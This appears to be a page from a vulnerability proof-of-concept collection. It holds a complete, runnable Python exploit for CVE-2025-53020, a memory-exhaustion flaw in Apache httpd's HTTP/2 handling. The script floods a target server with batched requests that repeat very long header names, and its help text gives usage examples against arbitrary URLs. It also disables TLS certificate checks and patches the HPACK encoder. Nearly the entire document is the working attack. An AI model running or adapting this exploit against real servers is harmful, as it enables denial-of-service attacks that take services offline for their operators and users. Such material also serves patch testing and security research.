4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
import h2.connection
import socket
import time
import tqdm
import argparse
import ssl
from urllib.parse import urlparse
import struct


class H2Attacker:
    """HTTP/2 client for testing memory exhaustion vulnerabilities in Apache httpd."""
    
    def __init__(self, url):
        """Initialize the attacker with target URL.
        
        Args:
            url (str): Target URL (e.g., 'https://example.com/path')
        """
        parsed_url = urlparse(url)
        self.protocol = parsed_url.scheme
        self.host = parsed_url.hostname
        self.port = parsed_url.port or (443 if self.protocol == 'https' else 80)
        self.path = parsed_url.path or '/'
        
        # Validate required components
        if not self.host:
            raise ValueError(f"Invalid URL: {url}. Host is required.")
        
        # Connection objects
        self.socket = None
        self.http2_connection = None
        
        # Create pseudo headers from URL components
        self.pseudo_headers = self._create_pseudo_headers()
        self.default_headers = self.pseudo_headers.copy()
        
    def _create_pseudo_headers(self):
        """Create HTTP/2 pseudo headers from URL components.
        
        Returns:
            list: List of pseudo header tuples
        """
        return [
            (':method', 'GET'),
            (':path', self.path),
            (':authority', self.host),
            (':scheme', self.protocol)
        ]
        
    def connect(self):
        """Establish HTTP/2 connection to the target server."""
        try:
            # Create socket connection
            self.socket = socket.create_connection((self.host, self.port))
            # Set SO_LINGER to 5 seconds to ensure graceful shutdown with FIN
            self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 5))
            
            # Setup TLS if HTTPS
            if self.protocol == 'https':
                self._setup_tls()
            
            # Initialize HTTP/2 connection
            self.http2_connection = h2.connection.H2Connection()
            self.http2_connection.initiate_connection()
            self.socket.sendall(self.http2_connection.data_to_send())
            
            # Apply the encoder patch for empty values
            self._patch_encoder_for_empty_values()
            
        except Exception as e:
            raise ConnectionError(f"Failed to connect to {self.host}:{self.port}: {e}")
    
    def _setup_tls(self):
        """Setup TLS connection with HTTP/2 ALPN."""
        context = ssl.create_default_context()
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE
        # Set ALPN to negotiate HTTP/2
        context.set_alpn_protocols(['h2'])
        # Wrap socket with TLS
        self.socket = context.wrap_socket(self.socket, server_hostname=self.host)
        # Ensure SSL handshake completes
        self.socket.do_handshake()
        

        
    def _patch_encoder_for_empty_values(self):
        """Patch the h2 encoder to fix empty value indexing bug."""
        if not self.http2_connection:
            raise RuntimeError("HTTP/2 connection not established")
            
        original_add = self.http2_connection.encoder.add
        
        def patched_add(to_add, sensitive, huffman=False):
            name, value = to_add
            
            # Set indexing mode
            indexbit = b'\x40' if not sensitive else b'\x10'  # INDEX_INCREMENTAL or INDEX_NEVER
            
            # Search for matching header
            match = self.http2_connection.encoder.header_table.search(name, value)
            
            if match is None:
                # Not in table - use original logic
                return original_add(to_add, sensitive, huffman)
            
            # Header is in table
            index, found_name, found_value = match
            
            # Fix: Check if found_value is not None (perfect match) instead of truthy
            if found_value is not None:
                # Perfect match - use indexed encoding
                return self.http2_connection.encoder._encode_indexed(index)
            else:
                # Name-only match - use indexed literal
                encoded = self.http2_connection.encoder._encode_indexed_literal(
                    index, value, indexbit, huffman
                )
                if not sensitive:
                    self.http2_connection.encoder.header_table.add(name, value)
                return encoded
        
        # Replace the add method
        self.http2_connection.encoder.add = patched_add
        
    def set_default_headers(self, additional_headers):
        """Set default headers by combining pseudo headers with additional headers.
        
        Args:
            additional_headers (list): List of additional header tuples
        """
        self.default_headers = self.pseudo_headers + additional_headers
        
    def send_headers(self, headers, add_pseudo_headers=True):
        """Send HTTP/2 headers for a single request.
        
        Args:
            headers (list): List of header tuples
            add_pseudo_headers (bool): Whether to prepend pseudo headers
        """
        if not self.http2_connection:
            raise RuntimeError("HTTP/2 connection not established")
            
        if add_pseudo_headers:
            headers = self.pseudo_headers + headers
            
        stream_id = self.http2_connection.get_next_available_stream_id()
        self.http2_connection.send_headers(stream_id, headers, end_stream=True)
        self.socket.sendall(self.http2_connection.data_to_send())

    def send_default_headers(self):
        """Send a request using the default headers."""
        if not self.default_headers:
            raise ValueError("Default headers are not set")
        self.send_headers(self.default_headers, add_pseudo_headers=False)
    
    def add_headers_to_batch(self, headers):
        """Add headers to batch without sending immediately.
        
        Args:
            headers (list): List of header tuples
        """
        if not self.http2_connection:
            raise RuntimeError("HTTP/2 connection not established")
            
        stream_id = self.http2_connection.get_next_available_stream_id()
        self.http2_connection.send_headers(stream_id, headers, end_stream=False)
        
    def send_batch(self):
        """Send all batched headers."""
        if not self.http2_connection:
            raise RuntimeError("HTTP/2 connection not established")
        self.socket.sendall(self.http2_connection.data_to_send())
    
    @staticmethod
    def create_repeated_header_name_headers(header_name_length=4000, header_reps=1000, char_to_repeat='a'):
        """Create headers with repeated long header names.
        
        Args:
            header_name_length (int): Length of the header name
            header_reps (int): Number of times to repeat the header
            char_to_repeat (str): Character to use for the header name
            
        Returns:
            list: List of header tuples with repeated long names
        """
        header_name = char_to_repeat * header_name_length
        return [(header_name, '')] * header_reps
    
    def run_attack_with_headers(self, headers, requests_per_batch, num_batches, delay_between_batches=0):
        """Run the memory exhaustion attack with specified headers.
        
        Args:
            headers (list): Headers to use for the attack
            requests_per_batch (int): Number of requests to send per batch
            num_batches (int): Number of batches to send
            delay_between_batches (float): Delay in seconds between batches
        """
        print(f"Starting attack: {num_batches} batches of {requests_per_batch} requests each")
        
        for _ in tqdm.tqdm(range(num_batches), desc="Sending batches"):
            for _ in range(requests_per_batch):
                self.add_headers_to_batch(headers)
            self.send_batch()
            
            if delay_between_batches > 0:
                time.sleep(delay_between_batches)
    
    def run_attack_with_default_headers(self, requests_per_batch, num_batches, delay_between_batches=0):
        """Run attack using the default headers.
        
        Args:
            requests_per_batch (int): Number of requests to send per batch
            num_batches (int): Number of batches to send
            delay_between_batches (float): Delay in seconds between batches
        """
        self.run_attack_with_headers(
            self.default_headers, requests_per_batch, num_batches, delay_between_batches
        )


def run_memory_exhaustion_attack(url, header_name_length, header_reps, requests_per_batch, 
                                num_batches, delay_between_batches=0, num_headers_to_repeat=1):
    """Run the memory exhaustion attack against Apache httpd.
    
    Args:
        url (str): Target URL
        header_name_length (int): Length of repeated header names
        header_reps (int): Number of header repetitions per request
        requests_per_batch (int): Number of requests per batch
        num_batches (int): Number of batches to send
        delay_between_batches (float): Delay between batches in seconds
        num_headers_to_repeat (int): Number of different header names to create using different characters
    """
    print(f"Targeting: {url}")
    print(f"Header name length: {header_name_length}")
    print(f"Header repetitions: {header_reps}")
    print(f"Number of different header names: {num_headers_to_repeat}")
    
    # Initialize attacker
    attacker = H2Attacker(url)
    attacker.connect()
    
    # First, send an initial request to add the header to HPACK table
    print("Sending initial request to populate HPACK table...")
    initial_headers = H2Attacker.create_repeated_header_name_headers(
        header_name_length=header_name_length, header_reps=1
    )
    attacker.send_headers(initial_headers)
    
    # Prepare attack headers with different character patterns
    print("Preparing attack headers...")
    attack_headers = []
    for i in range(num_headers_to_repeat):
        char = chr(ord('a') + i)
        headers = H2Attacker.create_repeated_header_name_headers(
            header_name_length=header_name_length, 
            header_reps=header_reps, 
            char_to_repeat=char
        )
        attack_headers.extend(headers)
    # Set as default headers and run attack
    attacker.set_default_headers(attack_headers)
    attacker.run_attack_with_default_headers(
        requests_per_batch=requests_per_batch,
        num_batches=num_batches,
        delay_between_batches=delay_between_batches
    )
    
    print("Attack completed. Waiting for server response...")
    time.sleep(5)


def main():
    parser = argparse.ArgumentParser(
        description='''HTTP/2 Memory Exhaustion PoC for Apache httpd

This tool exploits CVE-2025-53020 in Apache httpd by sending HTTP/2 requests with repetitive long header names,
which takes advantage of unnecessary memory duplication for header names.

The attack works by:
1. Creating long header names (--header-name-length) to maximize memory consumption
2. Optionally creating multiple distinct header names (--num-headers-to-repeat) using different characters (a, b, c, etc.)
3. Sending batches of requests (--batches) where:
   - Each request contains multiple repetitions of the header names (--header-reps)
   - Multiple requests can be sent per batch (--requests-per-batch)
   - Optional delays between batches can be configured (--delay)
4. The server allocates memory for each header name occurrence, leading to memory exhaustion

Example usage:
    python poc.py --url https://target.com/api/endpoint
    python poc.py --url http://localhost:8080/test --header-reps 1000
    python poc.py --url https://target.com --num-headers-to-repeat 3
        ''',
        formatter_class=argparse.RawDescriptionHelpFormatter
    )
    
    parser.add_argument('--url', required=True, 
                       help='Target URL (e.g., https://example.com/path)')
    parser.add_argument('--header-name-length', type=int, default=4064, 
                       help='Length of header name (default: 4064)')
    parser.add_argument('--header-reps', type=int, default=2063, 
                       help='Number of header repetitions per request (default: 2063)')
    parser.add_argument('--requests-per-batch', type=int, default=1, 
                       help='Number of requests per batch (default: 1)')
    parser.add_argument('--batches', type=int, default=100, 
                       help='Number of batches (default: 100)')
    parser.add_argument('--delay', type=float, default=0, 
                       help='Delay between batches in seconds (default: 0)')
    parser.add_argument('--num-headers-to-repeat', type=int, default=1, 
                       help='Number of different header names to create (default: 1)')
    
    args = parser.parse_args()
    # If using multiple header names, force requests per batch to 1
    if args.num_headers_to_repeat != 1:
        if args.requests_per_batch != 1:
            print(f"Warning: When using multiple header names > 1, requests per batch is recommended to be 1")
        if args.header_name_length > 4000:
            print(f"ERROR: When using multiple header names > 1, header name length should be less than 4000")
            return 1
        
    if args.header_name_length > 4064:
        print(f"ERROR: Header name length should be less than 4064")
        return 1
    
    if args.header_reps > 2063:
        print(f"Warning: Header reps should be less than 2063")
        
    try:
        run_memory_exhaustion_attack(
            url=args.url,
            header_name_length=args.header_name_length,
            header_reps=args.header_reps,
            requests_per_batch=args.requests_per_batch,
            num_batches=args.batches,
            delay_between_batches=args.delay,
            num_headers_to_repeat=args.num_headers_to_repeat
        )
    except Exception as e:
        print(f"Error: {e}")
        return 1
    
    return 0


if __name__ == "__main__":
    exit(main())